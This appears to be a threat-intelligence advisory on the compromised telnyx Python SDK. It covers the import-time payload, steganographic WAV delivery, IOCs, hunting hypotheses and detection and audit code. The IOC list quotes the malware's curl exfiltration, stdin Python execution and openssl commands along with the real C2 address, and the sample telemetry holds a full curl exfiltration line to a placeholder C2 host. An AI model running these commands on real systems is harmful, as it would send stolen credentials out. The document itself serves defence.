
TeamPCP Compromises Telnyx Python SDK to Deliver Credential-Stealing Malware

The official Telnyx Python SDK on PyPI was compromised by the threat actor TeamPCP, who published malicious versions (4.87.1 and 4.87.2) containing credential-harvesting malware. The malware executes upon module import, utilizing audio steganography to deliver OS-specific payloads: a fileless in-memory harvester for Linux/macOS and a persistent binary for Windows, with exfiltrated data secured via hybrid encryption.

Sens: Immediate | Conf: high | Analyzed: 2026-03-31

Authors: Socket

Actors: TeamPCP

Source: Socket

IOCs · 3

Key Takeaways

  • Malicious versions 4.87.1 and 4.87.2 of the official telnyx Python SDK were uploaded to PyPI to deliver credential-harvesting malware.
  • The attack executes at module import time (src/telnyx/_client.py), successfully bypassing standard PyPI postinstall hook detection.
  • The malware uses audio steganography, hiding its second-stage payloads within WAV files (ringtone.wav, hangup.wav) downloaded from the C2.
  • It implements OS-specific attack paths: a fileless in-memory harvester on Linux/macOS, and a persistent PE binary (msbuild.exe) dropped in the Startup folder on Windows.
  • Exfiltrated data is secured using hybrid encryption (AES-256-CBC and RSA-4096) via system OpenSSL, making it unrecoverable without the threat actor's private key.

Affected Systems

  • Linux, macOS, and Windows systems running Python applications that import the compromised telnyx package (versions 4.87.1 and 4.87.2).

Attack Chain

The attack begins when a developer or system imports the compromised telnyx package, triggering malicious code injected into src/telnyx/_client.py. On Windows, it downloads hangup.wav, extracts a PE binary via steganography, and drops it into the Startup folder as msbuild.exe for persistence. On Linux/macOS, it downloads ringtone.wav, extracts a Python script, and executes it filelessly in-memory to harvest credentials. The harvested data is then encrypted using AES-256-CBC and an RSA-4096 public key via OpenSSL, and exfiltrated to the C2 server using curl.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article does not provide explicit detection rules, but it details behavioral indicators, file paths, and network IOCs that can be used to build custom detection logic.

Detection Engineering Assessment

  • EDR Visibility: Medium — While the Linux/macOS execution is fileless and occurs in-memory, the spawning of child Python processes, invocation of system binaries (curl, openssl), and the dropping of a PE file into the Windows Startup folder are highly visible to EDR.
  • Network Visibility: High — C2 communication occurs over plain HTTP on port 8080. The downloading of WAV files and the POST exfiltration with custom headers (X-Filename) are easily observable in network traffic.
  • Detection Difficulty: Moderate — The initial payload is obfuscated and avoids standard PyPI installation hooks, making static detection harder. However, the reliance on system binaries and plain HTTP network traffic provides solid behavioral detection opportunities.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon Event ID 1)
  • File Creation (Sysmon Event ID 11)
  • Network Connections (Sysmon Event ID 3 / Zeek HTTP logs)

Hunting Hypotheses

| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
| --- | --- | --- | --- |
| Look for Python processes spawning child Python processes with '-' as an argument, indicating execution from standard input. | Process Creation | Execution | Low |
| Search for HTTP GET requests downloading .wav files from non-standard ports (e.g., 8080) using a generic 'Mozilla/5.0' User-Agent. | Network Traffic | Delivery | Medium |
| Identify file creation events in the Windows Startup folder named 'msbuild.exe', especially if originating from a Python process. | File System | Persistence | Low |
| Monitor for HTTP POST requests containing the custom header 'X-Filename: tpcp.tar.gz'. | Network Traffic | Exfiltration | Low |
| Detect Python processes invoking 'openssl' and 'curl' in rapid succession, particularly with output suppression flags. | Process Creation | Exfiltration | Medium |
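The first four hunting hypotheses and the curl behavioral indicator, expressed as matcher functions run over constructed telemetry. This is an added example, not code from the report or from Socket; the event dict shape, the rule names and the C2-PLACEHOLDER host are assumptions made for the example.

```python
import re

# Constructed telemetry (not from the report): Sysmon-style process/file events and Zeek-style HTTP records.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "python3", "image": "python3", "cmdline": "python3 -"},
    {"type": "http", "method": "GET", "port": 8080, "uri": "/ringtone.wav", "ua": "Mozilla/5.0"},
    {"type": "file", "image": "python.exe",
     "path": r"C:\Users\dev\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msbuild.exe"},
    {"type": "http", "method": "POST", "port": 8080, "uri": "/", "headers": {"X-Filename": "tpcp.tar.gz"}},
    {"type": "process", "parent": "python3", "image": "curl",
     "cmdline": 'curl -s -o /dev/null -H "X-Filename: tpcp.tar.gz" -X POST http://C2-PLACEHOLDER:8080/'},
    {"type": "http", "method": "GET", "port": 443, "uri": "/index.html", "ua": "Mozilla/5.0"},  # benign
]
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\msbuild\.exe$", re.IGNORECASE)

def match_python_stdin(ev):
    """H1: a Python parent spawning Python with '-' (script fed via stdin)."""
    argv = ev.get("cmdline", "").split()
    return (ev.get("type") == "process" and ev["parent"].startswith("python")
            and argv[0].startswith("python") and "-" in argv[1:])

def match_wav_download(ev):
    """H2: GET of a .wav over a non-standard port with a bare 'Mozilla/5.0' User-Agent."""
    return (ev.get("type") == "http" and ev["method"] == "GET"
            and ev["uri"].lower().endswith(".wav")
            and ev["port"] not in (80, 443) and ev.get("ua") == "Mozilla/5.0")

def match_startup_drop(ev):
    """H3: msbuild.exe created in the Startup folder by a Python process."""
    return (ev.get("type") == "file" and STARTUP_RE.search(ev["path"]) is not None
            and ev["image"].lower().startswith("python"))

def match_exfil_header(ev):
    """H4: POST carrying the custom 'X-Filename: tpcp.tar.gz' header."""
    return (ev.get("type") == "http" and ev["method"] == "POST"
            and ev.get("headers", {}).get("X-Filename") == "tpcp.tar.gz")

def match_curl_quiet_post(ev):
    """Behavioral indicator: curl spawned from Python with -s -o /dev/null and the X-Filename header."""
    cmd = ev.get("cmdline", "")
    return (ev.get("type") == "process" and ev["image"] == "curl" and ev["parent"].startswith("python")
            and "-s" in cmd.split() and "-o /dev/null" in cmd and "X-Filename: tpcp.tar.gz" in cmd)

RULES = {"python_stdin": match_python_stdin, "wav_download": match_wav_download, "startup_drop": match_startup_drop,
         "exfil_header": match_exfil_header, "curl_quiet_post": match_curl_quiet_post}

def hunt(events):
    """Return (rule_name, event) hits in event order; one event may hit several rules."""
    return [(name, ev) for ev in events for name, fn in RULES.items() if fn(ev)]
```

The fifth hypothesis (openssl followed by curl in rapid succession) needs time-window correlation across events and is not covered by these per-event matchers.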

Control Gaps

  • PyPI malware scanners relying solely on setup.py or postinstall hooks.
  • Static analysis tools failing to decode base64 blobs hidden within standard library imports.

Key Behavioral Indicators

  • Python process spawning a detached child process (start_new_session=True).
  • Unexpected imports (wave, tempfile, subprocess) in HTTP client modules.
  • curl execution with -s -o /dev/null and custom X-Filename header.

False Positive Assessment

  • Low. The specific combination of compromised telnyx package versions, hardcoded IPs, unique file paths (msbuild.exe in Startup), and custom HTTP headers makes these indicators highly specific to this threat.

Recommendations

Immediate Mitigation

  • Audit environments for telnyx==4.87.1 or 4.87.2 and downgrade to 4.87.0 immediately.
  • Rotate all API keys, tokens, SSH keys, and secrets accessible in environments where the compromised package was imported.
  • Block IP 83.142.209.203 at the network perimeter.
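A helper for the first mitigation step: scanning requirements or `pip freeze` lines for the compromised telnyx pins. Added example, not code from the report or the Telnyx project; the verdict labels and the sample requirement lines are constructed for the example.

```python
import re

COMPROMISED = {"4.87.1", "4.87.2"}  # malicious releases named in the report

# name, optional [extras], optional operator, version (stops at whitespace, ';' or '#')
REQ_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)(?:\[[^\]]*\])?\s*(===?|[<>~!]=|[<>])?\s*([^\s;#]*)")

def normalize(name):
    """PEP 503 normalization so Telnyx, telnyx and TELNYX compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()

def classify(req):
    """Verdict for one cleaned requirement: 'compromised', 'ok', 'unpinned' or None (not telnyx)."""
    m = REQ_RE.match(req)
    if not m or normalize(m.group(1)) != "telnyx":
        return None
    op, version = m.group(2), m.group(3)
    if op in ("==", "==="):
        return "compromised" if version in COMPROMISED else "ok"
    # A range or bare name lets the resolver choose, so the resolved version
    # (e.g. from `pip freeze`) must be checked separately.
    return "unpinned"

def audit(lines):
    """Map each telnyx requirement (comments stripped) to its verdict."""
    results = {}
    for line in lines:
        req = line.split("#", 1)[0].strip()
        if not req or req.startswith("-"):  # blank lines and pip options such as -r/-e
            continue
        verdict = classify(req)
        if verdict is not None:
            results[req] = verdict
    return results

# Constructed sample input (not from the report) mixing pinned, extras, range and safe entries.
SAMPLE_REQUIREMENTS = [
    "requests==2.31.0",
    "Telnyx==4.87.2   # pulled in by the billing service",
    "telnyx[async]==4.87.1",
    "telnyx>=4.80",
    "telnyx==4.87.0",
]
```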

Infrastructure Hardening

  • Implement egress filtering to block outbound connections to non-standard ports (like 8080) from production servers.
  • Purge quarantined versions from internal PyPI mirrors and dependency caches.

User Protection

  • Inspect Windows hosts for %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\msbuild.exe and related lock/tmp files.
  • Monitor CI/CD pipelines for exposure during the malicious release window.

Security Awareness

  • Educate developers on the risks of supply chain attacks and the importance of pinning dependencies to known good versions.
  • Train security teams to look beyond installation hooks for malicious code execution in Python packages.

MITRE ATT&CK Mapping

  • T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
  • T1059.006 - Command and Scripting Interpreter: Python
  • T1027.011 - Obfuscated Files or Information: Steganography
  • T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1620 - Reflective Code Loading
  • T1480.001 - Execution Guardrails: Environmental Keying
  • T1573.002 - Encrypted Channel: Asymmetric Cryptography
  • T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

Additional IOCs

  • IPs:
    • 83[.]142[.]209[.]203 - C2 server for payload delivery and exfiltration
  • URLs:
    • hxxp://83[.]142[.]209[.]203:8080/ - Receives encrypted exfiltration bundles (tpcp.tar.gz) via POST request
  • File Paths:
    • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\msbuild.exe.lock - Lock file to prevent re-execution of the Windows payload within a 12-hour window
    • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\msbuild.exe.tmp - Temporary file used during the extraction of the Windows PE binary
    • src/telnyx/_client.py - The specific file within the telnyx package where the malicious code was injected
  • Command Lines:
    • Purpose: Execute fileless Python payload from standard input | Tools: python, sys.executable, subprocess | Stage: Execution | subprocess.run([sys.executable, '-'], input=
    • Purpose: Encrypt exfiltrated data using system OpenSSL | Tools: openssl | Stage: Exfiltration | openssl enc -aes-256-cbc
    • Purpose: Exfiltrate encrypted data archive to C2 | Tools: curl | Stage: Exfiltration | curl -s -o /dev/null -H "X-Filename: tpcp.tar.gz" -X POST
  • Other:
    • MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+ 08qNLwm3kxzFSMj84M16lmIEeQA8u1X8DGK0EmNg7m3J6C3KzFeIzvz0UTgSq6cV pQWpiuQa+UjTkWmC8RDDXO8G/opLGQnuQVvgsZWuT31j/Qop6rtocYsayGzCFrMV 2/ElW1UE20tZWY+5jXonnMdWBmYwzYb5iwymbLtekGEydyLalNzGAPxZgAxgkbSE mSHLau61fChgT9MlnPhCtdXkQRMrI3kZZ4MDPuEEJTSqLr+D3ngr3237G14SRRQB IqIjly5OoFkqJxeNPSGJlt3Ino0qO7fy7LO0Tp9bFvXTOI5c+1lhgo0lScAu1ucA b6Hua+xRQ6s//PzdMgWT3R1aK+TqMHJZTZa8HY0KaiFeVQ3YitWuiZ3ilwCtwhT5 TlS9cBYph8U2Ek4K20qmp1dbFmxm3kS1yQg8MmrBRxOYyjSTQtveSeIlxrbpJhaU Z7eneYC4G/Wl3raZfFwoHtmpFXDxA7HaBUArznP55LD/rZd6gq7lTDrSy5uMXbVt 6ZnKd0IwHbLkYlX0oLeCNF6YOGhgyX9JsgrBxT0eHeGRqOzEZ7rCfCavDISbR5xK J4VRwlUSVsQ8UXt6zIHqg4CKbrVB+WMsRo/FWu6RtcQHdmGPngy+Nvg5USAVljyk rn3JMF0xZyXNRpQ/fZZxl40CAwEAAQ== - Hardcoded RSA-4096 public key used for hybrid encryption of exfiltrated data
    • tpcp.tar.gz - Name of the exfiltrated archive containing stolen credentials
    • telnyx==4.87.2 - Compromised version of the telnyx PyPI package (bugfix release by threat actor)